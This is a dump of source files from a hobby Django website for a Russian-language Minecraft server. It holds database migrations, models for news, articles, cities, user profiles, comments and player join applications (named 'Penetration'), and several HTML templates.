"avg_line_length": 24.2608699798584, "blob_id": "3d5829d675cc8c3153b1b5d94f2c44cdb47cd7e7", "content_id": "5fb4eb6485c4c2be586e56e6a0ea8bb9f416ed4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 66, "num_lines": 23, "path": "/blog/migrations/0021_auto_20210622_1616.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 13:16\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0020_penetration_create_date'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='penetration',\r\n name='how_you_know',\r\n field=models.TextField(default='Не описано.'),\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.CharField(default='False', max_length=5),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.8030303120613098, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 28.615385055541992, "blob_id": "eee8002ee187e31a2314ca62c527a82fb24cdea2", "content_id": "8c1ffecadcb4591070cfa54bb2bcf124cebf79ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 103, "num_lines": 13, "path": "/blog/admin.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\n\r\nfrom .models import Profile, News, Article, City, Penetration, NewsComment, UserComment, ArticleComment\r\n\r\n\r\nadmin.site.register(Profile)\r\nadmin.site.register(News)\r\nadmin.site.register(Article)\r\nadmin.site.register(City)\r\nadmin.site.register(Penetration)\r\nadmin.site.register(NewsComment)\r\nadmin.site.register(UserComment)\r\nadmin.site.register(ArticleComment)" }, { "alpha_fraction": 0.4633758068084717, "alphanum_fraction": 0.5238853693008423, "avg_line_length": 26.545454025268555, "blob_id": "56ea1f24fa547f5ac9591811193a8bb3790f3487", "content_id": "f395a8b69149688aa2cb0893e633913794e17c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 162, "num_lines": 22, "path": "/blog/migrations/0010_auto_20210618_1935.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 16:35\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0009_auto_20210618_1931'),\r\n ]\r\n\r\n operations = [\r\n migrations.RemoveField(\r\n model_name='profile',\r\n name='year_in_school',\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='role',\r\n field=models.CharField(choices=[('r1', 'Игрок'), ('r2', 'Журналист'), ('r3', 'Мэр'), ('r4', 'Президент'), ('r5', 'ФБР')], default='r1', max_length=2),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "e1abb1a55e270a1caf270a4c3911b6e27ee8d7cf", "content_id": "47f0a48d28d53cd80d7bed55547913cc927fdb75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 93, "license_type": "no_license", "max_line_length": 44, "num_lines": 4, "path": "/README.md", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", 
"text": "# Marupik_site\nSite for minecraft server\n\n[ссылка](http://mmarupik.pythonanywhere.com)\n" }, { "alpha_fraction": 0.5273833870887756, "alphanum_fraction": 0.5943204760551453, "avg_line_length": 26.38888931274414, "blob_id": "058f6f5907255c0d15a3eb31ea3e7be98c83e231", "content_id": "4d9c496b41a81dfd43ef80943173a00bc2266ab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 164, "num_lines": 18, "path": "/blog/migrations/0031_city_status.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 16:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0030_auto_20210719_1639'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='city',\n name='status',\n field=models.CharField(choices=[('Открыт', 'Открыт'), ('Закрыт', 'Закрыт'), ('Не функционирует', 'Не функционирует')], default='Открыт', max_length=17),\n ),\n ]\n" }, { "alpha_fraction": 0.5155763030052185, "alphanum_fraction": 0.5638629198074341, "avg_line_length": 25.913043975830078, "blob_id": "45eb403821e7e7926eaca6b4704d9dde4aa7f0a7", "content_id": "fa62abd3c836bec21c33a3e70a4a16755731934a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "no_license", "max_line_length": 127, "num_lines": 23, "path": "/blog/migrations/0007_auto_20210618_1239.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 09:39\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0006_auto_20210617_2242'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='role',\r\n field=models.TextField(default='Игрок'),\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='user_image',\r\n field=models.ImageField(blank=True, default='users/user_image/default/default.png', upload_to='users/user_image/'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5739871263504028, "alphanum_fraction": 0.5875741243362427, "avg_line_length": 62.25, "blob_id": "8efe543f5769a0b446c78de42150738f90384a96", "content_id": "01ac128cc9623c5d8d5fea75e6d0b64603151a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8430, "license_type": "no_license", "max_line_length": 220, "num_lines": 128, "path": "/blog/migrations/0001_initial.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.5 on 2021-07-19 11:14\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image2', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image1', models.ImageField(blank=True, 
default='city/image/default/default.png', upload_to='city/image/')),\n ('image3', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image4', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image5', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('title', models.CharField(max_length=100)),\n ('smol_text', models.TextField(default='Информация от мэра города не поступила.', max_length=400)),\n ('text', models.TextField(default='Информация от мэра города не поступила.')),\n ('contact_url', models.URLField()),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ('mayor', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='News',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(upload_to='news/image/')),\n ('title', models.CharField(max_length=1000)),\n ('text', models.TextField()),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('pyblished_date', models.DateTimeField(blank=True, null=True)),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Penetration',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('minecraft_nickname', models.CharField(default='Не указано', max_length=100)),\n ('site_username', models.CharField(default='Не указано', max_length=100)),\n ('donation_username', models.CharField(default='Не указано', max_length=100)),\n ('free_token', models.CharField(default='Не указано', max_length=300)),\n ('donation_image', models.ImageField(blank=True, default='penetration/image/default/default.png', upload_to='penetration/image/')),\n ('description_yourself', models.TextField(default='Не описано.')),\n ('how_you_know', models.TextField(default='Не описано.')),\n ('contact', models.CharField(max_length=200)),\n ('status', models.BooleanField(default=False)),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('image', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image1', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image2', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image3', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image4', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image5', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('title', models.CharField(max_length=100)),\n ('smol_text', models.TextField(default='Информация от мэра города не поступила.', max_length=400)),\n ('text', models.TextField(default='Информация от мэра города не поступила.')),\n ('contact_url', models.URLField()),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ('mayor', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='UserComment',\n fields=[\n ('id', 
models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('unconfirmed_discord', models.CharField(max_length=100)),\n ('user_image', models.ImageField(blank=True, default='users/user_image/default/default.png', upload_to='users/user_image/')),\n ('info', models.TextField(default='Проходивший мимо пользователь сайта,который ничего о себе не написал', max_length=1000)),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('role', models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=9)),\n ('discord', models.CharField(max_length=100)),\n ('admin', models.BooleanField(default=False)),\n ('registered', models.BooleanField(default=False)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.news')),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n ]\n" }, { "alpha_fraction": 0.4950248897075653, "alphanum_fraction": 0.5497512221336365, "avg_line_length": 20.33333396911621, "blob_id": "595fef1962fbe5a6cfd533fdd27131e6aa3d93ab", "content_id": "35ae3b48442ed56ac2535c35210a2b150f3339ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 402, "license_type": "no_license", "max_line_length": 70, "num_lines": 18, "path": "/blog/migrations/0016_city_mayor.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-20 17:33\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0015_city'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='city',\r\n name='mayor',\r\n field=models.CharField(default='ananist', max_length=100),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5678198933601379, "alphanum_fraction": 0.5799011588096619, "avg_line_length": 29.350000381469727, "blob_id": "8c7745dfce9523adeebafa25fc8a2e6787a64d22", "content_id": 
"ad1954dd10e80e90eb473b555b43264b203b54e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 145, "num_lines": 60, "path": "/blog/templates/city/one_city_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n<!DOCTYPE html>\n<html>\n\n<head>\n\t{% include 'parts_of_page/pages_head.html' %}\n\t<script type=\"text/javascript\" src=\"http://code.jquery.com/jquery-1.9.1.min.js\"></script>\n\t<script type=\"text/javascript\" src=\"{% static 'js/jquery.waterwheelCarousel.js' %}\"></script>\n\t<script type=\"text/javascript\" src=\"{% static 'js/Carousel.js' %}\"></script>\n\n</head>\n\t\n\n<body>\n\n\n<div class = \"wrapper\">\n\t{% include 'parts_of_page/header.html' %}\n\n\t<div class = \"content\" style=\"width: 100%;\">\n\t\t\t\n\t\t<div class=\"one_city\">\n\t\t\t\t\n\t\t\t\t<h1 class=\"title\">{{city.title}}</h1>\n\t\t\t\t<p class=\"author\">Информацию написал {{city.author}}</p>\n\t\t\t\t<p class=\"mayor\">Мэр города: {{city.mayor}}</p>\n\t\t\t\t<div id=\"carousel\">\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image1.url}}\" id=\"item-1\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image2.url}}\" id=\"item-2\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image3.url}}\" id=\"item-3\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image4.url}}\" id=\"item-4\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image5.url}}\" id=\"item-5\" /></a>\n\t\t\t\t</div>\n\n\t\t\t\t<p>Этот город {{status}}</p>\n\n\t\t\t\t<div class=\"text\" style=\"margin-bottom: 50px;\">\n\t\t\t\t\t{% for line in text %}\n\t\t\t\t\t\t<p>{{line}}</p>\n\t\t\t\t\t{% endfor %}\n\t\t\t\t</div>\n\n\t\t\t\t<a href=\"{{city.contact_url}}\">Отправить заявку на вступление.</a>\n\t\t\t\t<div class=\"buttons\" style=\"margin-top: 50px;\">\n\t\t\t\t\t{% if city.author == user.username or user.username == mayor or user.profile.admin or 'Представитель города' in request.user.profile.role %}\n\t\t\t\t\t\t<a class=\"button\" style=\"float:left;\" href=\"{%url 'edit_one_city' city_id=city.pk%}\">Редактировать</a>\n\t\t\t\t\t\t<a class=\"button\" style=\"float:right;\" href=\"{%url 'city_delete' city_id=city.pk%}\">Удалить</a>\n\t\t\t\t\t{% endif %}\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t\n\t</div>\n\n\t{% include 'parts_of_page/footer.html' %}\n</div>\n\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.5435435175895691, "alphanum_fraction": 0.5795795917510986, "avg_line_length": 29.272727966308594, "blob_id": "df025212b496cd2a321097f5161481f9435d2375", "content_id": "ce01c3f82ea964c9750ff48c7235d82cf3a04b59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 132, "num_lines": 33, "path": "/blog/migrations/0029_auto_20210719_1524.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-19 12:24\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0028_rename_user_id_comment_userid'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='unconfirmed_discord',\n field=models.CharField(default='Не задан', max_length=100),\n ),\n migrations.AlterField(\n model_name='comment',\n name='userid',\n field=models.CharField(default=3, max_length=1000),\n ),\n migrations.AlterField(\n model_name='profile',\n 
name='info',\n field=models.TextField(default='Проходивший мимо пользователь сайта,который ничего о себе не написал', max_length=1000),\n ),\n migrations.AlterField(\n model_name='usercomment',\n name='userid',\n field=models.CharField(default=3, max_length=1000),\n ),\n ]\n" }, { "alpha_fraction": 0.5026853084564209, "alphanum_fraction": 0.5370569229125977, "avg_line_length": 33.80769348144531, "blob_id": "fdc320558a46f4a6bcd83aab41830ef7e4a8904b", "content_id": "9a22defc80c561420cd7664212bfe149d2ecb424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 931, "license_type": "no_license", "max_line_length": 117, "num_lines": 26, "path": "/blog/migrations/0015_city.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-20 17:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0014_alter_news_author'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='City',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('image', models.ImageField(upload_to='city/image/')),\r\n ('title', models.CharField(max_length=100)),\r\n ('smol_text', models.TextField(max_length=1000)),\r\n ('text', models.TextField(max_length=100)),\r\n ('contact_url', models.URLField()),\r\n ('active', models.BooleanField(default=True)),\r\n ('author', models.CharField(default='ananist', max_length=100)),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.512442409992218, "alphanum_fraction": 0.5170506834983826, "avg_line_length": 17.066667556762695, "blob_id": "f82bb3bc25645b2a5c9feafb78c93521f6e8a64f", "content_id": "fc946bcb869575c824fa330ac1f41ff08d3f1406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 105, "num_lines": 60, "path": "/blog/templates/news/edit_news_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\t\t{% if user.username == author or user.profile.admin == True %}\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t\t\n\t\t\t\t\t<div class=\"content\">\n\t\t\t\t\t\t<div class=\"profile\">\n\t\t\t\t\t\t\t<form method=\"POST\" enctype=\"multipart/form-data\" class=\"add_something\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t\t\t{% csrf_token %}\n\n\t\t\t\t\t\t\t\t<div class=\"image_div\">\n\t\t\t\t\t\t\t\t\t<img src=\"{{image}}\" width=\"100%\">\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<p>{{ news_form.image }}</p>\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t<p>Заголовок новости:</p>\n\t\t\t\t\t\t\t\t<p>{{ news_form.title }}</p>\n\n\t\t\t\t\t\t\t\t<p>Текст новости:</p>\n\t\t\t\t\t\t\t\t<p>{{ news_form.text }}</p>\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t\n\n\t\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t\t</div>\n\t\t{% else %}\n\t\t\t{% include 'primitive/not_found_page.html' %}\n\t\t{% endif %}\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.5347467660903931, 
"alphanum_fraction": 0.5594817399978638, "avg_line_length": 31.959999084472656, "blob_id": "a55ee17fa6d45a591cdf87bcc71af329821372c4", "content_id": "74c96605a5bb8563377476e240c140a0aab332fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 854, "license_type": "no_license", "max_line_length": 117, "num_lines": 25, "path": "/blog/migrations/0003_users.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 17:54\r\n\r\nfrom django.db import migrations, models\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0002_news_active'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Users',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('image', models.ImageField(upload_to='users/image/')),\r\n ('username', models.CharField(max_length=50)),\r\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\r\n ('role', models.TextField(default='Игрок')),\r\n ('admin', models.BooleanField(default=False)),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4564755856990814, "alphanum_fraction": 0.522292971611023, "avg_line_length": 20.428571701049805, "blob_id": "aeed1f9dc657dec60b51860b4a31084077743368", "content_id": "e8d7fa2dd367db8640d191fbdae14746ad2dd4b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/blog/migrations/0005_auto_20210617_2127.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 18:27\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0004_auto_20210617_2123'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterModelOptions(\r\n name='users',\r\n options={'ordering': ('create_date',)},\r\n ),\r\n migrations.RemoveField(\r\n model_name='users',\r\n name='image',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.6212681531906128, "alphanum_fraction": 0.6421666145324707, "avg_line_length": 31.023473739624023, "blob_id": "40c24463d2d8f2a3f53a0d286dec87abaa2bd494", "content_id": "6778456b0bbed388c4b9c3f4e6eebdbae40d39fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7390, "license_type": "no_license", "max_line_length": 79, "num_lines": 213, "path": "/blog/models.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.db import models\r\nfrom django.utils import timezone\r\nfrom django.contrib.auth.models import User\r\nfrom django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom multiselectfield import MultiSelectField\r\n\r\nclass News(models.Model):\r\n image = models.ImageField(\r\n upload_to='news/image/',\r\n height_field=None,\r\n width_field=None,\r\n max_length=100\r\n )\r\n title = models.CharField(max_length=1000)\r\n text = models.TextField()\r\n create_date = models.DateTimeField(default=timezone.now)\r\n pyblished_date = models.DateTimeField(null=True, blank=True)\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n def publish(self):\r\n self.publish_date = timezone.now()\r\n\r\n\r\nclass 
NewsComment(models.Model):\r\n news = models.ForeignKey(\r\n News, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\n\r\nclass Article(models.Model):\r\n image = models.ImageField(\r\n upload_to='article/image/',\r\n height_field=None,\r\n width_field=None,\r\n max_length=100\r\n )\r\n title = models.CharField(max_length=1000)\r\n text = models.TextField()\r\n create_date = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n\r\n\r\nclass ArticleComment(models.Model):\r\n article = models.ForeignKey(\r\n Article, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\nclass UserComment(models.Model):\r\n user = models.ForeignKey(\r\n User, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\n\r\nclass Profile(models.Model):\r\n role1 = 'Игрок'\r\n role2 = 'Журналист'\r\n role3 = 'Мэр'\r\n role4 = 'Представитель города'\r\n role5 = 'ФБР'\r\n role6 = 'Глава ФБР'\r\n ROLES = [\r\n (role1, 'Игрок'),\r\n (role2, 'Журналист'),\r\n (role3, 'Мэр'),\r\n (role4, 'Представитель города'),\r\n (role5, 'ФБР'),\r\n (role6, 'Глава ФБР'),\r\n ]\r\n\r\n user = models.OneToOneField(User, on_delete=models.CASCADE)\r\n user_image = models.ImageField(\r\n upload_to='users/user_image/',\r\n default=\"users/user_image/default/default.png\",\r\n blank=True\r\n )\r\n\r\n info = models.TextField(\r\n default='Проходивший мимо пользователь сайта,'\r\n 'который ничего о себе не написал',\r\n max_length=1000\r\n )\r\n\r\n create_date = models.DateTimeField(default=timezone.now)\r\n role = MultiSelectField(choices=ROLES, default=role1)\r\n unconfirmed_discord = models.CharField(max_length=100, default=\"Не задан\")\r\n discord = models.CharField(max_length=100, default=\"Не задан\")\r\n admin = models.BooleanField(default=False)\r\n registered = models.BooleanField(default=False)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef create_user_profile(sender, instance, created, **kwargs):\r\n if created:\r\n Profile.objects.create(user=instance)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef save_user_profile(sender, instance, **kwargs):\r\n instance.profile.save()\r\n\r\n\r\nclass City(models.Model):\r\n status1 = 'Открыт'\r\n status2 = 'Закрыт'\r\n status3 
= 'Не функционирует'\r\n STATUS = [\r\n (status1, 'Открыт'),\r\n (status2, 'Закрыт'),\r\n (status3, 'Не функционирует'),\r\n ]\r\n\r\n image = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image2 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image1 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image3 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image4 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image5 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n\r\n title = models.CharField(max_length=100)\r\n smol_text = models.TextField(\r\n max_length=400,\r\n default=\"Информация от мэра города не поступила.\"\r\n )\r\n text = models.TextField(\r\n default=\"Информация от мэра города не поступила.\"\r\n )\r\n status = models.CharField(max_length=17, choices=STATUS, default=status1)\r\n contact_url = models.URLField()\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n mayor = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n\r\nclass Penetration(models.Model):\r\n minecraft_nickname = models.CharField(max_length=100, default=\"Не указано\")\r\n site_username = models.CharField(max_length=100, default=\"Не указано\")\r\n donation_username = models.CharField(max_length=100, default=\"Не указано\")\r\n free_token = models.CharField(max_length=300, default=\"Не указано\")\r\n donation_image = models.ImageField(\r\n default=\"penetration/image/default/default.png\",\r\n upload_to='penetration/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n description_yourself = models.TextField(default=\"Не описано.\")\r\n how_you_know = models.TextField(default=\"Не описано.\")\r\n contact = models.CharField(max_length=200)\r\n status = models.BooleanField(default=False)\r\n create_date = models.DateTimeField(default=timezone.now)\r\n" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.5368421077728271, "avg_line_length": 19.11111068725586, "blob_id": "e3cc646283957cbaf20221359106cc106f74e1dd", "content_id": "7e58f9396967906e4b52ef288a92f7ccb922731d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/blog/migrations/0028_rename_user_id_comment_userid.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# 